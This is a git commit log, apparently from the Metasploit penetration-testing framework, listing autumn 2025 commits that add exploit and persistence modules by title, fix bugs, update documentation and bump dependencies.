Martin Sutovsky fc434414d3 Randomizes XML paramater 2025-11-10 16:54:49 +01:00
Martin Sutovsky 2f361af316 Module init 2025-11-10 16:27:59 +01:00
cgranleese-r7 0e8fd9c603 Merge pull request #20686 from adfoster-r7/bump-mqtt-dependency
Bump mqtt dependency
2025-11-10 12:20:20 +00:00
Dean Welch 32874d05cf Add error handling for winrm login issues 2025-11-10 12:01:03 +00:00
adfoster-r7 e5597ee57e Bump mqtt dependency 2025-11-10 11:55:10 +00:00
Martin Sutovsky 2cbf32ce40 Adds documentation base 2025-11-10 12:27:13 +01:00
Martin Sutovsky d4283cd17f Adds base for Notepad++ persistence 2025-11-10 10:58:03 +01:00
h00die b646e0e044 docs editing for consistency 2025-11-07 15:42:27 -05:00
h00die fb02ec4554 remove 4 space indents in options 2025-11-07 15:42:27 -05:00
h00die caa2873a14 more adjustments 2025-11-07 15:42:27 -05:00
h00die d8c73f6684 replace bold options with h3 2025-11-07 15:42:23 -05:00
Jack Heysel ea3997978e Remove ldap_esc_vulnerable_cert_finder acceptance test 2025-11-07 15:25:59 -05:00
jenkins-metasploit 47f60e1625 Bump version of framework to 6.4.98 2025-11-06 18:14:52 +00:00
Martin Sutovsky 5ea47e5ac3 Adds formatting to XML data, adds automatic plugin ID extraction 2025-11-06 16:46:58 +01:00
Martin Sutovsky 570c7c0bf4 Changes CheckCode to Detected 2025-11-06 16:21:42 +01:00
Martin Sutovsky b0afe5e24b Randomizes parameters that can be randomized 2025-11-06 15:06:30 +01:00
Martin Sutovsky 904e752662 Code refactor 2025-11-06 14:52:49 +01:00
Martin Sutovsky cb0011649c Adds SCREEN_EFFECTS to SideEffects 2025-11-06 14:50:31 +01:00
Martin Sutovsky f586fff090 Adds clear message if exploit fails 2025-11-06 14:46:02 +01:00
jenkins-metasploit 1d19c37c62 automatic module_metadata_base.json update 2025-11-05 15:39:36 +00:00
Diego Ledda 110cb837aa Merge pull request #20672 from h00die-gr3y/centreon_auth_rce
Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946]
2025-11-05 16:29:29 +01:00
h00die-gr3y 34c424f473 update based on dledda-r7 comments 2025-11-05 09:20:13 +00:00
Brendan b70d9c074a Merge pull request #20673 from adfoster-r7/pin-date-dependency
Pin date dependency
2025-11-04 12:29:56 -06:00
Martin Sutovsky 5ad76f82d1 Adds more docs, adds description 2025-11-04 13:49:43 +01:00
Martin Sutovsky f195ebd453 Code refactor 2025-11-04 13:36:33 +01:00
Martin Sutovsky 98467f3a21 Adds msf payload to module, adds docs 2025-11-04 12:28:03 +01:00
Martin Sutovsky e885da1f0b Add rce for wsus 2025-11-03 20:47:28 +01:00
adfoster-r7 57a3590a94 Pin date dependency 2025-11-03 17:30:47 +00:00
h00die-gr3y 61dfc293d9 update based on dledda-r7 comments 2025-11-03 14:37:23 +00:00
Martin Sutovsky 96edf7bad4 Updates 2025-11-03 14:25:39 +01:00
h00die-gr3y 408eceb2d9 small update documentation 2025-11-03 10:27:44 +00:00
h00die-gr3y 85b4233345 updated module based on review comments and added documentation 2025-11-03 10:21:31 +00:00
h00die-gr3y 83e7fc2667 update attackerkb reference 2025-11-02 18:26:34 +00:00
h00die-gr3y e01456bcf4 init commit module 2025-11-02 17:45:22 +00:00
Stefan Walter 00661fa43a azure_ad_login: add context to error message
Include domain and username in the default/catch-all error message,
so that this information is not lost.
2025-11-01 13:19:01 +01:00
jenkins-metasploit 1c4e3d59ee automatic module_metadata_base.json update 2025-10-31 11:38:37 +00:00
Diego Ledda 13dc61e2e8 Merge pull request #20523 from h00die/modern_persistence_upstart
update upstart to persistence mixin
2025-10-31 12:28:59 +01:00
jenkins-metasploit ad0f984f4c automatic module_metadata_base.json update 2025-10-31 09:26:00 +00:00
msutovsky-r7 af5baeb3c6 Land #20660, adds windows task scheduler persistence module
Windows task scheduler persistence
2025-10-31 10:16:19 +01:00
jenkins-metasploit 54a1810273 automatic module_metadata_base.json update 2025-10-31 09:09:45 +00:00
msutovsky-r7 c804e5fb55 Land #20643, expands diamorphine privilege escalation module to other rootkits
Add Rootkit Privilege Escalation Signal Hunter
2025-10-31 10:00:21 +01:00
bcoles 676a2ed4b1 Add Rootkit Privilege Escalation Signal Hunter 2025-10-31 17:22:19 +11:00
jenkins-metasploit 7098e47626 Bump version of framework to 6.4.97 2025-10-30 16:37:30 +00:00
jenkins-metasploit fc7040bb1b automatic module_metadata_base.json update 2025-10-30 07:38:51 +00:00
msutovsky-r7 09f1d1ae57 Land #20650, adds module for NCR Command Center Agent unauthenticated RCE (CVE-2021-3122)
Add NCR Command Center Agent Unauthenticated RCE (CVE-2021-3122)
2025-10-30 08:26:42 +01:00
Martin Sutovsky 666e63f993 Rubocopes module 2025-10-30 07:43:32 +01:00
Martin Sutovsky ee3058bf92 Removes moved_from 2025-10-29 15:14:29 +01:00
jenkins-metasploit 90408517f1 automatic module_metadata_base.json update 2025-10-29 12:50:37 +00:00
Spencer McIntyre ca2f3ab3a6 Merge pull request #20648 from bcoles/cydia_default_ssh
exploit/apple_ios/ssh/cydia_default_ssh: Add mobile:alpine creds
2025-10-29 08:42:15 -04:00
jenkins-metasploit a9c91baf6f automatic module_metadata_base.json update 2025-10-29 12:32:11 +00:00
msutovsky-r7 56480df99f Land #20662, adds windows startup folder persistence module
windows persistence: startup folder
2025-10-29 13:23:35 +01:00
h00die 34b630736a Merge remote-tracking branch 'origin/windows_taskscheduler_persistence' into windows_taskscheduler_persistence 2025-10-29 05:22:55 -04:00
h00die f03b32551a Update modules/exploits/windows/persistence/task_scheduler.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-29 05:22:28 -04:00
h00die b48215d9c1 Merge remote-tracking branch 'origin/windows_taskscheduler_persistence' into windows_taskscheduler_persistence 2025-10-29 05:21:45 -04:00
h00die 35f632bc85 windows persistence: task scheduler review 2025-10-29 05:20:57 -04:00
h00die 85fa7e0391 windows persistence: startup folder review 2025-10-29 05:18:20 -04:00
Martin Sutovsky b167a2bc7d Adds moved_from clause 2025-10-29 07:58:50 +01:00
Martin Sutovsky 44c3d9b5db Fixes documentation, removes unused parameters, code cleanup 2025-10-29 07:58:47 +01:00
msutovsky-r7 65f764e8bc Corrects CheckCode from Vulnerable to Appears
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-10-29 07:57:20 +01:00
Martin Sutovsky 5bf842c15e Moves module to persistence category, docs reformat 2025-10-29 07:57:19 +01:00
Martin Sutovsky 547b318848 Moves linqpad deserialization to persistence category 2025-10-29 07:56:49 +01:00
Muhammad Daffa b98e66b744 Minor changes, code review from @msutovsky-r7 2025-10-29 13:18:17 +07:00
h00die fd6d84df0f Update modules/exploits/windows/persistence/task_scheduler.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-27 19:51:32 -04:00
h00die c0b3f40b3e upstart review 2025-10-27 19:45:38 -04:00
h00die fd04f465eb windows persistence: startup folder 2025-10-27 15:35:52 -04:00
jenkins-metasploit 8dd2724977 automatic module_metadata_base.json update 2025-10-27 14:06:20 +00:00
msutovsky-r7 d839a84a12 Land #20631, moves windows registry module into persistence category
update windows registry to persistence mixin
2025-10-27 14:57:48 +01:00
Muhammad Daffa 1b53604852 Code review changes from @msutovsky-r7 2025-10-27 17:19:11 +07:00
jenkins-metasploit 086fad626b automatic module_metadata_base.json update 2025-10-27 07:28:31 +00:00
bcoles c6d58d1b57 Land #20661, Add aarch64 payload support to gitea_git_fetch_rce module 2025-10-27 18:18:26 +11:00
Michael MacFadden b481b9ef7b gitea_git_fetch_rce aarch64 payload support
Add support for the Linux Dropper to use payloads targeted to ARCH_AARCH64
2025-10-26 19:19:11 -05:00
h00die 4fdce5e510 windows persistence: task scheduler 2025-10-26 16:26:32 -04:00
h00die c210a897ac windows persistence: task scheduler 2025-10-26 16:17:16 -04:00
jenkins-metasploit 8528cb255a automatic module_metadata_base.json update 2025-10-24 16:27:34 +00:00
Brendan d1c9410a95 Merge pull request #20594 from HamzaSahin61/feat/redoc-exposed-scanner
auxiliary(scanner/http/redoc_exposed): detect exposed ReDoc API docs UI
2025-10-24 11:19:13 -05:00
jenkins-metasploit 5d73d8a2c7 Bump version of framework to 6.4.96 2025-10-24 14:56:49 +00:00
adfoster-r7 52308d0df6 Merge pull request #20655 from adfoster-r7/fix-meterpreter-migration-crash
Fix Meterpreter migration crash
2025-10-24 14:39:21 +01:00
jenkins-metasploit c4dd66723f automatic module_metadata_base.json update 2025-10-24 13:38:10 +00:00
msutovsky-r7 d8357ce329 Land #20564, adds persistence suggester module
persistence suggester
2025-10-24 15:29:54 +02:00
adfoster-r7 a984e15cb6 Fix Meterpreter migration crash 2025-10-24 14:07:59 +01:00
adfoster-r7 4dd245a60e Merge pull request #20639 from adfoster-r7/fix-oracle-login-crash
Fix oracle login crash
2025-10-24 14:06:59 +01:00
adfoster-r7 a5dd6c37ff Merge pull request #20654 from molecula2788/msf_session_bootstrap_fix
lib/msf/base/sessions/meterpreter.rb: Use &. across the entire chain when handling datastore['AutoLoadExtensions']
2025-10-24 13:43:04 +01:00
Adrian Șendroiu c2ce203281 lib/msf/base/sessions/meterpreter.rb: Use &. across the entire chain when handling datastore['AutoLoadExtensions'] 2025-10-24 14:30:56 +03:00
dwelch-r7 1ee88e1a7a Merge pull request #20651 from adfoster-r7/pin-rexml-to-avoid-winrm-warnings
Pin rexml to avoid winrm warnings
2025-10-24 11:14:53 +01:00
dwelch-r7 7303e78f4a Merge pull request #20652 from adfoster-r7/fix-ssh-login-crash-for-pro
Fix ssh login crash for pro
2025-10-24 11:14:07 +01:00
adfoster-r7 25772a5a64 Fix ssh login crash for pro 2025-10-24 10:31:27 +01:00
adfoster-r7 8d35eb975d Pin rexml to avoid winrm warnings 2025-10-24 10:29:00 +01:00
Muhammad Daffa b059a61d1b Add ncr_cmcagent_rce module 2025-10-24 16:17:14 +07:00
Muhammad Daffa af2b2cc40f Add documentation for NCR Command Center Agent RCE 2025-10-24 16:15:11 +07:00
bcoles 33462bf233 exploit/apple_ios/ssh/cydia_default_ssh: Add mobile:alpine creds 2025-10-24 18:02:35 +11:00
bcoles 52b7f1ff25 Deprecate exploit/linux/local/diamorphine_rootkit_signal_priv_esc 2025-10-24 17:05:10 +11:00
h00die 0f26c9316a registry persistence peer review 2025-10-23 17:44:22 -04:00
Spencer McIntyre 100ac4b973 Remove unneeded code 2025-10-23 13:05:36 -04:00
jenkins-metasploit 909d872cf6 automatic module_metadata_base.json update 2025-10-23 16:52:30 +00:00
jheysel-r7 4bc06606ff Merge pull request #20640 from msutovsky-r7/fix/ldap/cert_finder/register_values
Adds safe navigator in ldap_esc_vulnerable_cert_finder
2025-10-23 09:44:17 -07:00
adfoster-r7 52f2094ccb Merge pull request #20641 from rapid7/smcintyre-r7-patch-1
Update contact emails in CODE_OF_CONDUCT.md
2025-10-23 15:01:47 +01:00
Spencer McIntyre c41c0c882b Update contact emails in CODE_OF_CONDUCT.md
Updated contact emails for reporting unacceptable behavior.
2025-10-23 09:15:15 -04:00
Martin Sutovsky 3c11db422a Adds safe navigation operator 2025-10-23 14:41:18 +02:00
Martin Sutovsky 51e3a2d0c5 Changes return value from nil to [] in enum_registry_values 2025-10-23 13:53:57 +02:00
adfoster-r7 b2d1095d22 Fix oracle login crash 2025-10-23 10:30:57 +01:00
HamzaSahin61 e17b2a0598 Remove 'How It Works' section from redoc_exposed.md
Removed the 'How It Works' section detailing the probing process for REDOC.
2025-10-23 01:45:38 +03:00
HamzaSahin61 9640152f25 Update redoc_exposed.md 2025-10-23 01:31:09 +03:00
Spencer McIntyre 3ef78ec103 Add docs for the new module 2025-10-22 15:00:44 -04:00
jenkins-metasploit c20dd4a278 automatic module_metadata_base.json update 2025-10-22 12:35:53 +00:00
adfoster-r7 f24552cdfd Merge pull request #20632 from h00die/linqpad_cleanup
Linqpad cleanup
2025-10-22 13:23:32 +01:00
adfoster-r7 1e1355bc7b Merge pull request #20636 from sjanusz-r7/anemone-infinite-recursion-fix
Infinite recursion on error page fix for Anemone
2025-10-22 11:35:19 +01:00
sjanusz-r7 fa6abd6011 Infinite recursion on error page fix for Anemone 2025-10-22 11:15:58 +01:00
jenkins-metasploit 546d17e032 automatic module_metadata_base.json update 2025-10-22 07:36:35 +00:00
msutovsky-r7 e5ee4d5384 Land #20630, adds authenticated RCE module for Vvveb CMS (CVE-2025-8518)
Add Vvveb CMS Authenticated RCE (CVE-2025-8518)
2025-10-22 09:27:59 +02:00
HamzaSahin61 49c1481687 Update redoc_exposed.md 2025-10-22 02:04:27 +03:00
jenkins-metasploit 7a9f24dc29 automatic module_metadata_base.json update 2025-10-21 16:37:11 +00:00
adfoster-r7 306ee8454b Merge pull request #20633 from Chocapikk/typo-freepbx
easy-fix: Fix typo in modules/exploits/unix/http/freepbx_unauth_sqli_to_rce
2025-10-21 17:28:49 +01:00
Maksim Rogov ff73363159 Update modules/exploits/multi/http/vvveb_auth_rce_cve_2025_8518.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-21 19:10:16 +03:00
Spencer McIntyre 79b7b54e11 Finish the smb_to_mssql relay module 2025-10-21 11:28:23 -04:00
Spencer McIntyre 67f407275c Initial non-functioning smb-to-mssql module 2025-10-21 11:21:00 -04:00
Spencer McIntyre c2ccac414d Remove the USE_WINDOWS_AUTHENT option
It's redundant with the Mssql::Auth option which is an enum and supports
all the authentication mechanisms. This eliminates the ambiguity between
the meaning and precedence of the options.
2025-10-21 11:20:51 -04:00
Martin Sutovsky 103e3d5044 Module init 2025-10-21 16:48:23 +02:00
vognik 45a87eaaca small fixes 2025-10-20 09:41:48 -07:00
vognik 74c7f98ad9 code review changes from @msutovsky-r7 2025-10-20 09:00:24 -07:00
Valentin Lobstein 97b58f9372 easy-fix: Fix typo in modules/exploits/unix/http/freepbx_unauth_sqli_to_rce 2025-10-20 14:29:19 +02:00
h00die 8490ce844d linqpad persistence cleanup 2025-10-19 10:08:33 -04:00
h00die ef9300870a linqpad persistence cleanup 2025-10-19 10:05:48 -04:00
h00die 287cba7436 linqpad persistence cleanup 2025-10-19 10:05:36 -04:00
h00die 2575a9ad03 windows registry persistence doc update 2025-10-19 09:45:06 -04:00
h00die bc9bd4b62c windows registry persistence mixin conversion 2025-10-19 09:36:59 -04:00
vognik 9ad83f6454 Add Vvveb CMS Authenticated RCE (CVE-2025-8518) 2025-10-18 17:12:05 -07:00
adfoster-r7 52f07b6820 Merge pull request #20627 from h00die/fix_post_docs_options
Update post docs to use modern h3 for options instead of original spec (bold)
2025-10-17 21:09:59 +01:00
adfoster-r7 664c9559d1 Merge pull request #20629 from h00die/no_4_space_options
Clean up 2 aux docs
2025-10-17 21:06:31 +01:00
h00die c86aefa328 remove 4 space indents in options 2025-10-16 19:34:39 -04:00
h00die 976c208414 remove 4 space indents in options 2025-10-16 19:31:50 -04:00
Spencer McIntyre dcb28f50a1 Clean up redundant output 2025-10-16 16:29:19 -04:00
Spencer McIntyre 7bfa17eb24 Update the kerberos login method too 2025-10-16 16:29:19 -04:00
Spencer McIntyre edf7325c68 Add tests for MsTdsLogin7 2025-10-16 16:29:19 -04:00
Spencer McIntyre e8c3200628 Add tests for MsTdsHeader 2025-10-16 16:29:19 -04:00
Spencer McIntyre 6f5ff3c7da Add tests for MsTdsLogin7Password 2025-10-16 16:29:19 -04:00
Spencer McIntyre 1cc412d95b Use the new Login7 for plain SQL login too 2025-10-16 16:29:19 -04:00
Spencer McIntyre 609537d845 Finish the Login7 definition 2025-10-16 16:29:19 -04:00
Spencer McIntyre 581b938772 Add some MsTds definitions 2025-10-16 16:29:19 -04:00
Spencer McIntyre 0996cee71d Refactor the login method to make it smaller 2025-10-16 16:29:19 -04:00
jheysel-r7 2d5f10d965 Merge pull request #20626 from h00die/fix_payload_docs_options
Update payload docs to use modern h3 for options instead of original spec (bold)
2025-10-16 08:42:07 -07:00
jenkins-metasploit a059f239c9 automatic module_metadata_base.json update 2025-10-16 14:48:42 +00:00
Diego Ledda 644bcfabbb Merge pull request #20522 from h00die/modern_persistence_sysvinit
update systemvinit to persistence mixin
2025-10-16 16:35:16 +02:00
jenkins-metasploit 5c3b9480bb Bump version of framework to 6.4.95 2025-10-16 11:06:34 +00:00
jenkins-metasploit f271212ab0 Bump version of framework to 6.4.94 2025-10-16 09:42:01 +00:00
h00die 40f3d4b72e fix doc options bold to h3 2025-10-15 16:38:17 -04:00
h00die 6cc4465f6f fix doc options bold to h3 2025-10-15 16:28:24 -04:00
jenkins-metasploit bb9f3b46de automatic module_metadata_base.json update 2025-10-15 17:32:08 +00:00
jheysel-r7 677af06c9f Merge pull request #20621 from h00die/modern_periodic_script
update periodic_script to persistence mixin
2025-10-15 10:23:56 -07:00
adfoster-r7 aa34a0e016 Merge pull request #20622 from h00die/fix_doc_options
Update aux docs to use modern h3 for options instead of original spec (bold)
2025-10-15 17:47:52 +01:00
adfoster-r7 1549f9cae5 Merge pull request #20623 from bcoles/spec-module-validation
spec: ModuleValidation: Validate module DefaultTarget value
2025-10-15 13:22:56 +01:00
bcoles daf280ad11 spec: ModuleValidation: Validate module DefaultTarget value 2025-10-15 19:58:25 +11:00
h00die c629dc408c replace some bolds 2025-10-14 20:44:00 -04:00
h00die 1f479ddedc update doc options to h3 from bold 2025-10-14 20:23:50 -04:00
h00die 55583bd2c8 review for sysv persistence 2025-10-14 19:30:06 -04:00
Christophe De La Fuente 3b727fbaf2 Code review 2025-10-14 16:25:43 +02:00
Christophe De La Fuente 0a755ea03a Add references to MITRE ATT&CK T1021 - Remote Services 2025-10-14 16:25:30 +02:00
h00die 68c74e1bcf remove unnecessary writabledir variable and check 2025-10-13 19:54:05 -04:00
h00die f3219668e0 remove unnedcessary sudo 2025-10-13 17:48:02 -04:00
h00die 1e9dd04505 update periodic_script to new persistence mechanism 2025-10-13 17:48:00 -04:00
h00die 7a8189f976 additional check 2025-10-13 14:07:18 -04:00
h00die c0b09693e3 systemv updated with mixin udpates 2025-10-13 13:42:41 -04:00
h00die 1a13d39a4d use attck ref in sysvinit persistence module 2025-10-13 13:42:41 -04:00
h00die 058e858e82 update systemvinit to persistence mixin 2025-10-13 13:42:41 -04:00
jenkins-metasploit 6f461098cc automatic module_metadata_base.json update 2025-10-13 17:01:56 +00:00
adfoster-r7 fcb469bf66 Merge pull request #20611 from bcoles/periodic_script_persistence
exploit/multi/local/periodic_script_persistence: Unset DefaultTarget
2025-10-13 17:50:57 +01:00
adfoster-r7 475b294ff9 Merge pull request #20620 from adfoster-r7/pin-rack-dependencies
Pin rack dependencies
2025-10-13 17:49:42 +01:00
adfoster-r7 8672c52d95 Merge pull request #20619 from adfoster-r7/future-proof-peinject-method-override
Future proof peinject method override
2025-10-13 16:24:57 +01:00
adfoster-r7 3532254691 Pin rack dependencies 2025-10-13 16:03:28 +01:00
adfoster-r7 edd536b3bf Future proof peinject method override 2025-10-13 15:22:05 +01:00
bcoles 93b3ec34ac exploit/multi/local/periodic_script_persistence: Unset DefaultTarget 2025-10-11 21:47:11 +11:00
futileskills 461ad3e0e2 msftidy fixes 2025-10-10 13:41:35 -05:00
futileskills d1cdf21551 formating fixes 2025-10-10 13:28:21 -05:00
adfoster-r7 55bb27711d Merge pull request #20608 from molecula2788/peinject_valid_fix
Add missing datastore argument in the `valid?` function in pe_inject.rb
2025-10-10 19:18:36 +01:00
futileskills 732ca0752b Apply review feedback to escpos module 2025-10-10 12:40:10 -05:00
FutileSkills d2e470f8c2 Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-10-10 12:05:44 -05:00
Adrian Șendroiu 7d5ad67ad6 pe_inject.rb: Add missing datastore argument 2025-10-10 13:24:50 +03:00
HamzaSahin61 bbd2767fe1 Update redoc_exposed.md 2025-10-10 00:10:38 +03:00
HamzaSahin61 33244f66f0 style: rubocop auto-corrections + add Notes metadata 2025-10-09 23:41:11 +03:00
jenkins-metasploit 67ff15edeb automatic module_metadata_base.json update 2025-10-09 18:59:02 +00:00
Brendan 91c0adb17f Merge pull request #20585 from vognik/CVE_2025_60787
Add MotionEye Authenticated RCE (CVE-2025-60787)
2025-10-09 13:50:25 -05:00
jenkins-metasploit 2c082a4fef automatic module_metadata_base.json update 2025-10-09 18:33:04 +00:00
Spencer McIntyre 27d0e638ed Merge pull request #20546 from dwelch-r7/fix-ssh-login-pubkey
Fix ssh login pubkey module
2025-10-09 14:24:09 -04:00
Vognik 267a26b763 code review changes from smcintyre-r7@ 2025-10-09 21:51:31 +04:00
Dean Welch 8c5c395ce7 Fix ssh login pubkey module 2025-10-09 12:36:00 +01:00
Metasploit 9e8b1d5a9c Bump version of framework to 6.4.93 2025-10-09 03:33:47 -05:00
jenkins-metasploit 7c997c88f0 automatic module_metadata_base.json update 2025-10-08 21:09:17 +00:00
jheysel-r7 a8ec46f2b2 Merge pull request #20579 from nakkouchtarek/listmonk_env_disclosure
Add Listmonk Template Function Environment Variable Disclosure Auxiliary Module (CVE-2025-49136)
2025-10-08 14:00:37 -07:00
Tarek Nakkouch 7c840a1bac Add Listmonk environment disclosure auxiliary module 2025-10-08 21:02:24 +01:00
HamzaSahin61 db6dbf4f8e Update redoc_exposed.md 2025-10-08 21:19:35 +03:00
jenkins-metasploit 5f80ca6a2b automatic module_metadata_base.json update 2025-10-08 18:08:33 +00:00
Brendan 10d1f53692 Merge pull request #19975 from dledda-r7/feat/split-stdapi
Split Stdapi
2025-10-08 13:00:04 -05:00
HamzaSahin61 4577a3d735 Update redoc_exposed.rb 2025-10-08 20:56:53 +03:00
jenkins-metasploit 3ed3b3964c automatic module_metadata_base.json update 2025-10-08 15:59:46 +00:00
jheysel-r7 4f4febfcac Merge pull request #20602 from zeroSteiner/fix/fusionpbx-cve
Remove a CVE that was mistakenly added
2025-10-08 08:51:17 -07:00
Brendan 05894ccb78 Apply suggestion from @bwatters-r7 2025-10-08 10:36:32 -05:00
Brendan 5d56f70ef2 Apply suggestion from @bwatters-r7 2025-10-08 10:35:50 -05:00
Brendan e9936265dd Update LICENSE_GEMS 2025-10-08 10:33:59 -05:00
Brendan 6a0a19b05d Apply suggestion from @bwatters-r7
Bump Payloads version again
2025-10-08 10:21:15 -05:00
Spencer McIntyre 7b2643ce5d Remove a CVE that was mistakenly added 2025-10-08 10:45:59 -04:00
dwelch-r7 02a894a189 Merge pull request #20601 from adfoster-r7/remove-faraday-pin
Remove faraday pin
2025-10-08 14:17:38 +01:00
adfoster-r7 9fe13e204a Remove faraday pin 2025-10-08 13:39:23 +01:00
jenkins-metasploit 077ed6b567 automatic module_metadata_base.json update 2025-10-08 11:13:33 +00:00
dwelch-r7 c03dd45875 Merge pull request #20600 from adfoster-r7/unpin-octokit
Unpin octokit
2025-10-08 12:04:58 +01:00
HamzaSahin61 33825d06ec Update redoc_exposed.rb 2025-10-08 03:45:12 +03:00
HamzaSahin61 941f3f3b72 Update redoc_exposed.md 2025-10-08 03:42:06 +03:00
HamzaSahin61 43526ee0e0 Update redoc_exposed.md 2025-10-08 03:37:43 +03:00
HamzaSahin61 67490e4244 Create redoc_exposed.md 2025-10-08 01:46:56 +03:00
jheysel-r7 eeaf760948 Merge pull request #20595 from zeroSteiner/fix/add-missing-cves
Add Missing CVE Data To Modules In Bulk
2025-10-07 15:28:37 -07:00
HamzaSahin61 fc35a8a32f Update redoc_exposed.rb 2025-10-08 01:09:29 +03:00
Spencer McIntyre 9dc5696cc4 Update dash characters in module references 2025-10-07 14:03:32 -04:00
Spencer McIntyre fd21209e4d Add missing CVEs from VulnCheck 2025-10-07 13:59:13 -04:00
Spencer McIntyre 17c5b3707a Add missing module notes 2025-10-07 13:59:13 -04:00
Spencer McIntyre d727302de6 Pass all the files to msftidy to speed things up 2025-10-07 13:59:13 -04:00
adfoster-r7 e0ed3f7d6f Unpin octokit 2025-10-07 18:08:30 +01:00
jheysel-r7 e202546d5d Merge pull request #20597 from adfoster-r7/update-developer-dependencies
Update developer dependencies
2025-10-07 07:59:04 -07:00
jheysel-r7 08510166a4 Merge pull request #20596 from adfoster-r7/update-rails-dependencies
Update rails dependencies
2025-10-07 07:52:56 -07:00
dledda-r7 7d8aa260e4 fix: better extension suggestion with an unknown command 2025-10-07 09:53:02 -04:00
adfoster-r7 8991bec4c3 Update developer dependencies 2025-10-07 13:36:06 +01:00
adfoster-r7 a029f34a6f Update rails dependencies 2025-10-07 13:33:20 +01:00
BenoitDePaoli f9f0530640 fix(console): prevent RHOSTS temp file deletion after services -R 2025-10-07 14:24:50 +02:00
Vognik 5cb1968c42 small fixes 2025-10-07 08:49:24 +04:00
Vognik 1be31c05da add some random 2025-10-07 08:38:20 +04:00
Vognik c05a9d3f7f code review changes from @bwatters-r7 2025-10-07 03:07:26 +04:00
jheysel-r7 f61a321dcd Merge pull request #20591 from survivant/feature/fix-typos-hacktoberfest
Fix typos in documentation / hacktoberfest
2025-10-06 13:43:32 -07:00
jenkins-metasploit e1bcc0aab6 automatic module_metadata_base.json update 2025-10-06 20:31:43 +00:00
jheysel-r7 dbf84abec3 Merge pull request #20586 from bcoles/windows_script_host_wsf
Add Malicious Windows Script Host Script File (.wsf) module
2025-10-06 13:21:56 -07:00
HamzaSahin61 c2f554bc36 auxiliary(scanner/http/redoc_exposed): detect exposed ReDoc API docs UI 2025-10-06 22:37:28 +03:00
dledda-r7 763f631852 fix: better loading check for split-stdapi 2025-10-06 08:40:09 -04:00
Vognik 25624e9ae0 code review changes 2025-10-06 15:46:59 +04:00
dledda-r7 35fe047a6e chore: stdapi extensions fix comments, and format 2025-10-06 07:29:32 -04:00
dledda-r7 381ed892fa chore: stdapi command dispatcher fix comments, and format 2025-10-06 06:48:12 -04:00
Diego Ledda a1ab9b8ca9 Update lib/rex/post/meterpreter/extensions/stdapi_audio/stdapi_audio.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-10-06 10:31:54 +02:00
Diego Ledda 69ebefec13 Update lib/rex/post/meterpreter/client_core.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2025-10-06 10:30:45 +02:00
Diego Ledda 650ee9f6f1 Update lib/rex/payloads/meterpreter/config.rb 2025-10-06 10:10:05 +02:00
Sebastien Dionne 77f760c1bf Fix typos in documentation 2025-10-05 12:01:16 -04:00
bcoles 9a8d1473d8 Add Malicious Windows Script Host Script File (.wsf) module 2025-10-05 20:16:00 +11:00
Vognik 6d295b993a Add MotionEye Unauthenticated RCE (CVE-2025-60787) 2025-10-05 05:32:32 +04:00
jenkins-metasploit 05c854b1c5 automatic module_metadata_base.json update 2025-10-03 20:45:10 +00:00
jheysel-r7 5252e92954 Merge pull request #20568 from bcoles/vbsobfuscate
Msf::Exploit::VBSObfuscate: Add VBS obfuscation library
2025-10-03 13:36:43 -07:00
jenkins-metasploit 7b9ce27117 automatic module_metadata_base.json update 2025-10-03 17:13:21 +00:00
jheysel-r7 04188cb9cb Merge pull request #20527 from h00die/modern_persistence_plist
update plist persistence to mixin
2025-10-03 10:05:17 -07:00
jenkins-metasploit 4526ae920e automatic module_metadata_base.json update 2025-10-03 14:53:51 +00:00
msutovsky-r7 1491edeeb0 Land #20563, adds automatic identifying and checking of CAs when running registry check
Update reg checks when DC and CA are separate
2025-10-03 16:45:09 +02:00
dledda-r7 5f2adab0e7 fix: updated stdapi loading logic 2025-10-03 09:53:50 -04:00
Jack Heysel 74d229e11f Multiple CA testing 2025-10-02 18:14:00 -07:00
Spencer McIntyre 0aed5fcfbc Merge pull request #20582 from xHector1337/bump-rex-random_identifier
Bump rex-random_identifier to version 0.1.21
2025-10-02 17:35:56 -04:00
Muzaffer Umut ŞAHİN 82f1335e82 Bump rex-random_identifier to version 0.1.21 2025-10-02 18:47:47 +03:00
Metasploit 8a021abf56 Bump version of framework to 6.4.92 2025-10-02 03:32:41 -05:00
msutovsky-r7 b5c9547cc0 Land #20456, adds documentation for wordpress_cp_calendar_sqli auxiliary module
Add documentation for auxiliary/scanner/http/wordpress_cp_calendar_sqli
2025-10-02 08:02:12 +02:00
Martin Sutovsky 3cc91f544e Fixes msftidy_docs issues 2025-10-02 07:39:48 +02:00
Martin Sutovsky 103ae28696 Addressing comments 2025-10-02 07:36:10 +02:00
Jack Heysel f19f910f7e Add msPKI-Certificate-Name-Flag to cert details 2025-10-01 17:35:36 -07:00
Jack Heysel 1da518ec82 Responded to comments 2025-10-01 17:35:36 -07:00
Jack Heysel c73ffae95b Updated CA datastore option definition 2025-10-01 17:35:36 -07:00
Jack Heysel 0458c3db70 minor edits 2025-10-01 17:35:36 -07:00
Jack Heysel 66d59a7ddc Update reg checks when DC and CA are separate 2025-10-01 17:35:36 -07:00
jenkins-metasploit a3498db126 automatic module_metadata_base.json update 2025-10-01 06:48:16 +00:00
msutovsky-r7 6e06963495 Land #20566, adds support to esc_update_ldap module when shadow credentials are not required
Update esc_update_ldap module so shadow creds not required
2025-10-01 08:39:26 +02:00
msutovsky-r7 81127918fe Land #20518, adds NTLM leak/LNK padding fileformat modules
Adds fileformat NTLM leak/LNK padding modules
2025-09-29 15:34:40 +02:00
Martin Sutovsky c044db677d Cleares up docs 2025-09-29 14:29:11 +02:00
Martin Sutovsky 310b8b7f8a Includes share datastore option in UNC path 2025-09-29 11:37:42 +02:00
Martin Sutovsky 38efab0bab Rubocopes, fixes SMB server, code cleanup 2025-09-29 11:33:33 +02:00
Martin Sutovsky 5faf18795c Rubocopes, fixes SMB server 2025-09-29 11:20:55 +02:00
Martin Sutovsky eaada61d80 Fixes notes 2025-09-29 11:10:00 +02:00
